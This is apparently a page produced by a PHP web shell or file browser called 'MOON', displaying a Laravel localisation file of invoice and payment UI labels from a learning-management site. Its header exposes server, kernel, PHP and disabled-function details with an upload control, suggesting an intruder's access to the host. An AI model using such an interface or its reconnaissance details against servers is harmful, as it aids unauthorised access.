MOON
Server: Apache
System: Linux 101-53-147-124.cprapid.com 4.18.0-553.121.1.el8_10.x86_64 #1 SMP Thu Apr 30 09:06:34 EDT 2026 x86_64
User: clientsoftwares (1005)
PHP: 8.2.30
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open
Upload Files
File: /home/clientsoftwares/public_html/lms.clientsoftwares.com/resources/lang/default/invoice.php
<?php
return [
    'Invoice' => 'Invoice',
    'Settings' => 'Settings',
    'Invoice Setting' => 'Invoice Setting',
    'Prefix' => 'Prefix',
    'Setting Update Successfully' => 'Setting Update Successfully',
    'Setting Update Failed' => 'Setting Update Failed',
    'footer text' => 'Footer Text',
    'Invoice List' => 'Invoice List',
    'New Invoice' => 'New Invoice',
    'Add New Invoice' => 'Add New Invoice',
    'Payment' => 'Payment',
    'Offline' => 'Offline',
    'Online' => 'Online',
    'Create Invoice' => 'Create Invoice',
    'Add New Course' => 'Add New Course',
    'Add More' => 'Add More',
    'Please Select Student First' => 'Please Select Student First',
    'Invoice Created Successfully' => 'Invoice Created Successfully',
    'Invoice Created Failed' => 'Invoice Created Failed',
    'Invoice Updated Successfully' => 'Invoice Updated Successfully',
    'Invoice Update Failed' => 'Invoice Update Failed',
    'Invoice Deleted Successfully' => 'Invoice Deleted Successfully',
    'Invoice Delete Failed' => 'Invoice Delete Failed',
    'Send To Student Email' => 'Send To Student Email',
    'My Invoice' => 'My Invoice',
    'Pay Now' => 'Pay Now',
    'Notify To Email' => 'Notify To Email',
    'No Invoice Generate Yet' => 'No Invoice Generate Yet',
    'Invoice Number' => 'Invoice Number',
    'Pending Bank Payment' => 'Pending Bank Payment',
    'Pending Offline Payment' => 'Pending Offline Payment',
    "Already Paid, You Cant Edit/Update" => "Already Paid, You Can't Edit/Update",
    'Bank Payment' => 'Bank Payment',
    'Bank Account Info' => 'Bank Account Info',
    'Current Account' => 'Current Account',
    'Savings Account' => 'Savings Account',
    'Salary Account' => 'Salary Account',
    'Fixed Deposit' => 'Fixed Deposit',
    'Cheque Slip' => 'Cheque Slip',
    'Payment Successful' => 'Payment Successful',
    'Payment Failed' => 'Payment Failed',
    'Payment Type' => 'Payment Type',
    'Created' => 'Created',
    'Send' => 'Send',
    'Paid' => 'Paid',
    'Pending' => 'Pending',
    'Printed Certificate' => 'Printed Certificate',
    'Printed certificate' => 'Printed Certificate',
    'Order List' => 'Order List',
    'Order Now' => 'Order Now',
    'Certificate Order List' => 'Certificate Order List',
    'Ordered' => 'Ordered',
    'Shipped' => 'Shipped',
    'Certificate Shipped' => 'Certificate Shipped',
    'Edit Invoice' => 'Edit Invoice',
    'Subscription/Product Title'=>'Subscription/Product Title',
    'Qty'=>'Qty',
    'Unit Price'=>'Unit Price',
    'Total Price'=>'Total Price'
];